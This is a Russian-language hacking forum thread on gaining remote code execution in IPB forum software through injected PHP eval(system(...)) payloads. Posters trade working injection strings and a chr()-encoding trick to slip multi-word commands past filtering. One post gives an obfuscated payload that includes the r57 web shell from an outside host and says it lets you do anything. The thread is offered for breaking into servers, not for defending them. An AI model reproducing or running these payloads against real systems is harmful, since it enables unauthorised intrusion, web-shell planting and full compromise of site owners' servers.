а ты про это? да я это юзал и щас юзаю тему четал самого начала так что я прсто не понял очень он говарит думал что что то новенькое ивени.
Вставляю в сообщение eval(system(ls)); //' , выдаёт, как и надо, файлы на сервере, делаю eval(system(id)); //', работает, вообще, работают все команды из одного слова. Но когда пробую например ls -la, или which wget, то пишет ошибку. Но тогда и шелл нельзя залить... Что я делаю не так?
Попробуй кодирование команд, например eval(system(chr(108).chr(115).chr(32).chr(45).chr(108).chr(97)).chr(59).exit());//
Именно так и надо. Странно, в топике уже про это писали, а вопросы всё возникают. В видео тоже кто-то так делал и ссылку выкладывал. 1. http://forum.antichat.ru/thread7345.html 2. Поиск по форуму. 3. Google.ru
Code: eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); // Include шелла RST. С ним все что угодно сделаете
Тема выполнения произвольного кода на ИПБ закрыта. Всё что нужно для взлома в теме описано. Всё остальное в гугле. Ура!